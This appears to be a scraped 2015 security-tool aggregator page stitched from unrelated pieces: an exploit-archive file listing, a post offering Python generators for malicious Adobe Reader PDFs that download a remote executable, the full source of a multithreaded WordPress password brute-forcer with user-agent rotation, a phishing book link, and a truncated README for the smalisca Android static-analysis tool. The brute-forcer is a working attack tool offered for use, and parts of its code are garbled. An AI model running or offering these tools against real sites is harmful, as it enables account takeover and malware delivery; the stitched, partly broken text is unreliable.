1504-exploits/wpduplicator-sqlxsrf.txt
1504-exploits/VL-1215.txt
1504-exploits/wp_worktheflow_upload.rb.txt
1504-exploits/rootpipe.rb.txt
1504-exploits/6kbbs80-xsrf.txt
1504-exploits/fmp3cr2628-overflow.txt
1504-exploits/wpyoastgs-xss.txt
1504-exploits/ninja-racecondition.txt
1504-exploits/opointmedia-openredirect.txt
1504-exploits/wp_nmediawebsite_file_upload.rb.txt
1504-exploits/texttospeech-xss.txt
1504-exploits/wpnexforms3-sql.txt
1504-exploits/nasagov-xss.txt
1504-exploits/sambaopenldap-xss.txt
1504-exploits/wpcontentslide-xssxsrf.txt
1504-exploits/wpsam-upload.txt
1504-exploits/freepbx-xss.txt
1504-exploits/pligg202-xss.txt
1504-exploits/ZSL-2015-5240.txt
1504-exploits/netcatcms-inject.txt
1504-exploits/phpsfp-sql.txt
1504-exploits/ZSL-2015-5238.txt
1504-exploits/wptunelibrary154-sql.txt
1504-exploits/testdisk-overflow.txt
1504-exploits/websid-xss.txt
1504-exploits/wpshareaholic-xss.txt
1504-exploits/cpx_proftp.py.txt
1504-exploits/huaweiseqanalyst-xss.txt
1504-exploits/jaws111-xsrf.txt
1504-exploits/wpmon-disclose.txt
1504-exploits/untangle-xssdisclose.txt
1504-exploits/samsungipolis-exec.txt
1504-exploits/orangehrm321411-sqlxss.txt
1504-exploits/jboss_seam_upload_exec.rb.txt
1504-exploits/netsol_web_mail.pdf
1504-exploits/SA-20150409-0.txt
1504-exploits/VL-1444.txt
1504-exploits/edruttmsdpim-traversalfile.txt
1504-exploits/zenworks-exectraversal.txt
1504-exploits/hotexbilling-xss.txt
1504-exploits/osxrootpipe-escalate.txt
1504-exploits/miniupnpd-overflow.txt
1504-exploits/wprevolutionslider-shell.txt
1504-exploits/ossolution-sql.txt
1504-exploits/VL-1228.txt
1504-exploits/wpdesignfolio-shell.txt
1504-exploits/wpcommunityevents135-sql.txt
1504-exploits/thehunter.txt
1504-exploits/CORE-2015-0008.txt
1504-exploits/solarwinds_fsm_userlogin.rb.txt
1504-exploits/phptraffica23-xss.txt
1504-exploits/pimcorecms305-xsrf.txt
1504-exploits/wolfcms082-shell.txt
1504-exploits/otrs31x-xss.txt
1504-exploits/php-typeconfusion.txt
1504-exploits/avsarsoftmatbaa-shellxss.txt
1504-exploits/wooframework451-xss.txt
1504-exploits/joomlasimplephotogallery-shell.txt
1504-exploits/ubuntuusbcreator-escalate.txt
1504-exploits/wp_creativecontactform_file_upload.rb.txt
1504-exploits/weebly-hijack.txt
1504-exploits/wpultimatenewspaper-xss.txt
1504-exploits/wpvvci-shell.txt
1504-exploits/PRL-2015-04.tgz
1504-exploits/idm6-dllhijack.txt
1504-exploits/Mac-OS-X_Fat-DoS.c
1504-exploits/openletters-inject.txt
1504-exploits/encapsflashgallery-dos.txt
1504-exploits/VL-1438.txt
1504-exploits/adobe_flash_copy_pixels_to_byte_array.rb.txt
1504-exploits/flatpress10-xss.txt
1504-exploits/SA-20150410-0.txt
1504-exploits/synology-xss.txt
1504-exploits/VL-1453.txt
1504-exploits/wp_slideshowgallery_upload.rb.txt
1504-exploits/edruttmsdprv-xss.txt
1504-exploits/edruttmsdp-redirect.txt
1504-exploits/VL-1474.txt
1504-exploits/wpsam-sql.txt
1504-exploits/ZSL-2015-5242.txt
1504-exploits/VL-1452.txt
1504-exploits/javacom-xss.txt
1504-exploits/barracuda_5x_reports_postauth_root_exploit.rb.txt
1504-exploits/safari-crossdomain.txt
1504-exploits/SGMA15-002.txt
1504-exploits/VL-1359.txt
1504-exploits/comsenzsupesitecms70-xss.txt
1504-exploits/eceprojects-xss.txt
1504-exploits/apachespark-exec.txt
1504-exploits/ceragon_fibeair_known_privkey.rb.txt
1504-exploits/wpcitizenspace-xss.txt
1504-exploits/VL-1447.txt
1504-exploits/edruttmsdp-xss.txt
1504-exploits/ceragonfibeair-disclose.txt
1504-exploits/zyxel-dos.txt
1504-exploits/huaweiseqanalyst-xxe.txt
1504-exploits/wpqaengine-escalate.txt
1504-exploits/apportabrt-exec.txt
1504-exploits/qlik-redirect.txt
1504-exploits/wpvideogallery28-sql.txt
1504-exploits/pyscripter-dllhijack.txt
1504-exploits/bluedragon-traversal.txt
1504-exploits/meela-xss.txt
1504-exploits/unipdf12-overflow.txt
1504-exploits/wpworktheflow252-shell.txt
1504-exploits/VL-1446.txt
1504-exploits/soapfault-typeconfusion.txt
1504-exploits/wpnmediawcf-shell.txt
1504-exploits/mefa-xss.txt
1504-exploits/goautodial-execsqlupload.txt
1504-exploits/ZSL-2015-5239.txt
1504-exploits/ZSL-2015-5241.txt
1504-exploits/wpseopack180-shell.txt
1504-exploits/wpstatistics912-xss.txt
1504-exploits/wpvvp-shell.txt
1504-exploits/xoops2571-xss.txt
1504-exploits/androidbackupagent-exec.txt
1504-exploits/apportabrt-issues.txt
1504-exploits/freebsdkey-disclose.txt
1504-exploits/legend_rce.py.txt
1504-exploits/wpwdippu-upload.txt
1504-exploits/wp_reflexgallery_file_upload.rb.txt
1504-exploits/libarchive-dos.tgz
1504-exploits/log2space62-xss.txt
1504-exploits/wpajaxstorelocator-sql.txt
tar: 1504-exploits/wpajaxstorelocator-sql.txt: time stamp 2015-05-16 05:33:33 is 1279061.268089756 s in the future-
1
-
-
Here is adobe reader expls CVE-2011-2462 and 2 different verions of CVE-2010-2883 all codes is pythons
usage for cve2011-4262 : createExploitPDF.py http://example.com/bin/bad.exe
usage for CVE-2010-2883 : [input_file.exe] [output_file.pdf]
adobe.rar — RGhost — file sharing
List of files
File name Size Compressed Ratio
adobe/createExploitPDF.py 32.2 KB 5.93 KB 18.425%
adobe/PDF2883v2.py 414 KB 128 KB 30.835%
adobe/PDF2883v3.py 665 KB 202 KB 30.306%
adobe
Source: opensc
-
-
This is a python script that performs brute forcing against WordPress installs using a wordlist.
WordPress Brute Force by Claudio Viviani
Inspired by xSecurity's WordPress Brute Muliththreading
Tested on Wordpress 3.x and 4.x
Disclaimer:
This tool is intended for educational purposes only and the author
can not be held liable for any kind of damages done whatsoever to your machine,
or damages caused by some other,creative application of this exploit.
In any case you disagree with the above statement,stop here.
Requirements:
- python's httplib2 lib
Installation:
pip install httplib2
Features:
- Multithreading
- xml-rpc brute force mode
- http and https protocols support
- Random User Agent
CHANGELOG:
2015-04-12 v2.0
- Add new feature xml-rpc brute force mode
- Fix minor bugs
2015-04-11 v1.1
- optparse (Deprecated since version 2.7) replaced by argparse
- Fix connection bugs
Download:
#!/usr/bin/env python
#
# WordPress Brute Force by Claudio Viviani
#
# Inspired by xSecurity's WordPress Brute Muliththreading
#
# Tested on Wordpress 3.x and 4.x
#
# Disclaimer:
#
# This tool is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.
#
# Requirements:
#
# 1) python's httplib2 lib
# Installation: pip install httplib2
#
# Features:
#
# 1) Multithreading
# 2) xml-rpc brute force mode
# 3) http and https protocols support
# 4) Random User Agent
#
# CHANGELOG:
#
# 2015-04-12 v2.0
# 1) Add new feature xml-rpc brute force mode
# 2) Fix minor bugs
#
# 2015-04-11 v1.1
# 1) optparse (Deprecated since version 2.7) replaced by argparse
# 2) Fix connection bugs
#
#
import urllib, httplib, httplib2
import socket, sys, os, os.path, argparse, random
from threading import Thread
from time import sleep
banner = """
___ ___ __
| Y .-----.----.--| .-----.----.-----.-----.-----.
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|: | |__|
|::.|:. |
`--- ---'
_______ __ _______
| _ .----.--.--| |_.-----| _ .-----.----.----.-----.
|. 1 | _| | | _| -__|. 1___| _ | _| __| -__|
|. _ |__| |_____|____|_____|. __) |_____|__| |____|_____|
|: 1 \ |: |
|::.. . / |::.|
`-------' `---'
W0rdBRUTEpr3ss v2.0
Written by:
Claudio Viviani
info@homelab.it
homelabit@protonmail.ch
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
https://www.facebook.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
def randomAgentGen():
userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
UA = random.choice(userAgent)
return UA
def urlCMS(url,brutemode):
if url[:8] != "https://" and url[:7] != "http://":
print('\n[X] You must insert http:// or https:// procotol')
os._exit(1)
# Page login
if brutemode == "std":
url = url+'/wp-login.php'
else:
url = url+'/xmlrpc.php'
return url
def bodyCMS(username,pwd,brutemode):
if brutemode == "std":
body = { 'log':username,
'pwd':pwd,
'wp-submit':'Login',
'testcookie':'1' }
else:
body = """<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>wp.getUsersBlogs</methodName>
<params><param><value>%s</value></param><param><value>%s</value></param></params></methodCall>""" % (username, pwd)
return body
def headersCMS(UA,lenbody,brutemode):
if brutemode == "std":
headers = { 'User-Agent': UA,
'Content-type': 'application/x-www-form-urlencoded',
'Cookie': 'wordpress_test_cookie=WP+Cookie+check' }
else:
headers = { 'User-Agent': UA,
'Content-type': 'text/xml',
'Content-Length': "%d" % len(lenbody)}
return headers
def responseCMS(response):
if response['set-cookie'].split(" ")[-1] == "httponly":
return "1"
def connection(url,user,password,UA,timeout,brutemode):
username = user
pwd = password
http = httplib2.Http(timeout=timeout, disable_ssl_certificate_validation=True)
# HTTP POST Data
body = bodyCMS(username,pwd,brutemode)
# Headers
headers = headersCMS(UA,body,brutemode)
try:
if brutemode == "std":
response, content = http.request(url, 'POST', headers=headers, body=urllib.urlencode(body))
if str(response.status)[0] == "4" or str(response.status)[0] == "5":
print('[X] HTTP error, code: '+str(response.status))
os._exit(1)
if responseCMS(response) == "1":
print('\n')
print('[!] Password FOUND!!!')
print('')
print('[!] Username: '+user+' Password: '+password)
os._exit(0)
checkCon = "OK"
return checkCon
else:
response, content = http.request(url, 'POST', headers=headers, body=body)
if str(response.status)[0] == "4" or str(response.status)[0] == "5":
print('[X] HTTP error, code: '+str(response.status))
os._exit(1)
# Remove all blank and newline chars
xmlcontent = content.replace(" ", "").replace("\n","")
if not "403" in xmlcontent:
print('\n')
print('[!] Password FOUND!!!')
print('')
print('[!] Username: '+user+' Password: '+password)
os._exit(0)
checkCon = "OK"
return checkCon
except socket.timeout:
print('[X] Connection Timeout')
os._exit(1)
except socket.error:
print('[X] Connection Refused')
os._exit(1)
except httplib.ResponseNotReady:
print('[X] Server Not Responding')
os._exit(1)
except httplib2.ServerNotFoundError:
print('[X] Server Not Found')
os._exit(1)
except httplib2.HttpLib2Error:
print('[X] Connection Error!!')
os._exit(1)
commandList = argparse.ArgumentParser(sys.argv[0])
commandList.add_argument('-S', '--standard',
action="store_true",
dest="standard",
help="Standard login brute",
)
commandList.add_argument('-X', '--xml-rpc',
action="store_true",
dest="xml",
help="Xml-rpc login brute",
)
commandList.add_argument('-t', '--target',
action="store",
dest="target",
help="Insert URL: http://www.victimurl.com[:port]",
)
commandList.add_argument('-u', '--username',
action="store",
dest="username",
help="Insert username",
)
commandList.add_argument('-w', '--wordfilelist',
action="store",
dest="wordfilelist",
help="Insert wordlist file",
)
commandList.add_argument('--timeout',
action="store",
dest="timeout",
default=10,
type=int,
help="Timeout Value (Default 10s)",
)
options = commandList.parse_args()
# Check bruteforce mode conflicts
if options.standard and options.xml:
print "\n[X] Select standard [-S] OR xml-rpc
] bruteforce mode"sys.exit(1)
# Check args
if not options.standard and not options.xml:
print(banner)
print
commandList.print_help()
sys.exit(1)
elif not options.target or not options.username or not options.wordfilelist:
print(banner)
print
commandList.print_help()
sys.exit(1)
# Set bruteforce mode
if options.standard:
brtmd="std"
else:
brtmd="xml"
# args to vars
url = options.target
user = options.username
password = options.wordfilelist
timeout = options.timeout
# Check if Wordlist file exists and has readable
if not os.path.isfile(password) and not os.access(password, os.R_OK):
print "[X] Wordlist file is missing or is not readable"
sys.exit(1)
# Open and read Wordlist file
wordlist = open(password).read().split("\n")
# Remove last empty values from wordlist list
del wordlist[-1]
# Total lines (password) in Wordlist file
totalwordlist = len(wordlist)
# Gen Random UserAgent
UA = randomAgentGen()
# Url to url+login_cms_page
url = urlCMS(url,brtmd)
print(banner)
print
print('[+] Target.....: '+options.target)
print('[+] Wordlist...: '+str(totalwordlist))
print('[+] Username...: '+user)
if brtmd == "std":
print('[+] BruteMode..: Standard')
else:
print('[+] BruteMode..: Xml-Rpc')
print('[+]')
print('[+] Connecting.......')
print('[+]')
# Check connection with fake-login
if connection(url,user,UA,UA,timeout,brtmd) == "OK":
print('[+] Connection established')
# Reset var for "progress bar"
count = 0
threads = []
for pwd in wordlist:
count += 1
t = Thread(target=connection, args=(url,user,pwd,UA,timeout,brtmd))
t.start()
threads.append(t)
sys.stdout.write('\r')
sys.stdout.write('[+] Password checked: '+str(count)+'/'+str(totalwordlist))
sys.stdout.flush()
sleep(0.210)
for a in threads:
a.join()
# no passwords found
print('\n[X] Password NOT found
') - python's httplib2 lib
-
Phishing Dark Waters
The Offensive and Defensive Sides of Malicious Emails
Authors:
- Cristopher Hadnagy
- Michelete Fincher
Foreword by ROBIN DREEKE
Download:
https://www.scribd.com/doc/261558462/Phishing-Dark-Waters-The-Offensive-and-Defensive-Sides-of-Malicious-Emails
-
1
- Cristopher Hadnagy
-
README.rst
=========================================
Static Code Analysis for Smali
=========================================
If you ever have looked at Android applications you know to appreciate
the ability of analyzing your target at the most advanced level. Dynamic
programm analysis will give you a pretty good overview of your applications
activities and general behaviour. However sometimes you'll want to just
analyze your application **without** running it. You'll want to have a look
at its components, analyze how they interact and how data is tainted
from one point to another.
This is was the major factor driving the development of *smalisca*. There
are indeed some good reasons for a *static code analysis* before the
*dynamic* one. Before interacting with the application I like to know
how the application has been build, if there is any API and generate all
sort of *call flow graphs*. In fact graphs have been very important to
me since they *visualize* things. Instead of jumping from file to file,
from class to class, I just look at the graphs.
While graph building has been an important reason for me to code such a
tool, *smalisca* has some other neat **features** you should read about.
Features
========
At the moment there are some few major functionalities like:
* **parsing**
You can parse a whole directory of **Smali** files and **extract**:
* class information
* class properties
* class methods
* calls between methods of different classes
You can then **export** the results as **JSON** or **SQLite**.
Have a loot at the `parsing page <http://smalisca.readthedocs.org/en/latest/parsing.html>`_ for more information.
* **analyzing**
After exporting the results you'll get an **interactive prompt** to take
a closer look at your parsed data. You can **search** for classes, properties,
methods and even method calls. You can then apply several **filters** to your search
criterias like::
smalisca> sc -c class_name -p test -r 10 -x path -s class_type
This command will search for *10* (-r 10) classes which contain the pattern *test* (-p)
in their *class name* (-c). Afterwards the command will exclude the column *path*
(-x path) from the results and sort them by the *class type* (-s).
Let's have a look at another example::
smalisca> scl -fc com/android -fm init -r 10
This will search for all **method calls** whose *calling* class name contains the pattern
*com/android* (-fc). Additionally we can look for calls originating from methods whose
name contain the pattern *init* (-fm).
You can of course read your commands from a file and analyze your results in a *batch*-
like manner::
$ cat cmd.txt
sc -c class_name -p com/gmail/xlibs -r 10 -x path
quit
$ ./smalisca.py analyzer -i results.sqlite -f sqlite -c cmd.txt
...
Have a loot at the `analysis page <http://smalisca.readthedocs.org/en/latest/analysis.html>`_ for more information.
* **visualizing**
I think this the **most** valuable feature of *smalisca*. The ability to visualize your
results in a structured way makes your life more comfortable. Depending on what you're
interested in, this tool has several graph drawing features I'd like to promote.
At first you can draw your packages including their classes, properties and methods::
smalisca> dc -c class_name -p test -f dot -o /tmp/classes.dot
:: INFO Wrote results to /tmp/classes.dot
smalisca>
This will first search classes whose class name contains *test* and then export the
results in the **Graphviz DOT** language. You can then manually generate a graph using
*dot*, *neato*, *circo* etc. Or you do that using the interactive prompt::
smalisca> dc -c class_name -p test -f pdf -o /tmp/classes.pdf --prog neato
:: INFO Wrote results to /tmp/classes.pdf
smalisca>
Have a loot at the `drawing page <http://smalisca.readthedocs.org/en/latest/drawing.html>`_ for more information.
Screenshots
===========
.. figure:: http://smalisca.readthedocs.org/en/latest/_images/smalisca_search_classes.png
:scale: 99%
:alt: Basic usage
Output results as table.
.. figure:: http://smalisca.readthedocs.org/en/latest/_images/smalisca_dxcl_dot_0.png
:scale: 99%
:alt: Cross calls
Basic relationships between classes and modules.
Have a look at the `screenshots page <http://smalisca.readthedocs.org/en/latest/screenshots.html>`_.
Installation
============
Refer to the `installation page <http://smalisca.readthedocs.org/en/latest/installation.html>`_.
Requirements:
* Python (2.x / 3.x)
* `cement <http://builtoncement.com/>`_
* Graphviz
* SQLAlchemy
How to use it
=============
After installing the tool, you may want to first pick up an Android application (APK)
to play with. Use `apktool <https://code.google.com/p/android-apktool/>`_ or my own tool
`ADUS <https://github.com/dorneanu/adus>`_ to dump the APKs content. For the sake of
simplicity I'll be using **FakeBanker** which I've analyzed in a previous
`blog post <http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/>`_.
First touch
-----------
But first let's have a look at the tools main options::
$ smalisca --help
___
/\_ \ __
____ ___ ___ __ \//\ \ /\_\ ____ ___ __
/',__\ /' __` __`\ /'__`\ \ \ \ \/\ \ /',__\ /'___\ /'__`\
/\__, `\/\ \/\ \/\ \/\ \L\.\_ \_\ \_\ \ \/\__, `\/\ \__//\ \L\.\_
\/\____/\ \_\ \_\ \_\ \__/.\_\/\____\\ \_\/\____/\ \____\ \__/.\_\
\/___/ \/_/\/_/\/_/\/__/\/_/\/____/ \/_/\/___/ \/____/\/__/\/_/
--------------------------------------------------------------------------------
:: Author: Victor <Cyneox> Dorneanu
:: Desc: Static Code Analysis tool for Smali files
:: URL: http://nullsecurity.net, http://{blog,www}.dornea.nu
:: Version: 1.0
--------------------------------------------------------------------------------
usage: smalisca.py (sub-commands ...) [options ...] {arguments ...}
[--] Static Code Analysis (SCA) tool for Baskmali (Smali) files.
commands:
analyzer
[--] Analyze results using an interactive prompt or on the command line.
parser
[--] Parse files and extract data based on Smali syntax.
optional arguments:
-h, --help show this help message and exit
--debug toggle debug output
--quiet suppress all output
--log-level {debug,info,warn,error,critical}
Change logging level (Default: info)
-v, --version show program's version number and exit
Parsing
-------
I'll first **parse** some directory for **Smali** files before doing the analysis stuff::
$ smalisca parser -l ~/tmp/FakeBanker2/dumped/smali -s java -f sqlite -o fakebanker.sqlite
...
:: INFO Parsing .java files in /home/victor/tmp/FakeBanker2/dumped/smali ...
:: INFO Finished parsing!
:: INFO Exporting results to SQLite
:: INFO Extract classes ...
:: INFO Extract class properties ...
:: INFO Extract class methods ...
:: INFO Extract calls ...
:: INFO Commit changes to SQLite DB
:: INFO Wrote results to fakebanker.sqlite
:: INFO Finished scanning
Also have a look at the `parsing page <http://smalisca.readthedocs.org/en/latest/parsing.html>`_ for further information.
Analyzing
----------
Now you're free to do whatever you want with your generated exports. You can inspect the **SQLite DB**
directly or use *smaliscas* **analysis** features::
$ smalisca analyzer -f sqlite -i fakebanker.sqlite
...
smalisca>sc -x path -r 10
+----+-----------------------------------------------------------------------------------------+--------------------+--------------------------+-------+
